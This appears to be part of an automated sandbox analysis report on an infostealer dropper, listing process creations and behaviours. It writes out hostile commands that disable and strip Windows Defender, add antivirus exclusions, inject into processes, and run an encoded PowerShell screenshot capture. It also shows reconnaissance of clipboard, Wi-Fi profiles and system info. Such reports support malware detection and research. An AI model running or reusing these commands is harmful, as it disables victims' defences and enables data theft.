                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Modifies the context of a thread in another process (thread injection)
                                Source: C:\ProgramData\setup.exeThread register set: target process: 8740
                                Source: C:\ProgramData\svchost.exeThread register set: target process: 8104
                                Source: C:\ProgramData\svchost.exeThread register set: target process: 8104
                                Source: C:\ProgramData\svchost.exeThread register set: target process: 8104
                                Removes signatures from Windows Defender
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Writes to foreign memory regions
                                Source: C:\ProgramData\setup.exeMemory written: C:\Windows\System32\dialer.exe base: 76FFEA5010
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeProcess created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quietJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quietJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogymJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogymJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quietJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknown
                                Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\ProgramData\svchost.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7796"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
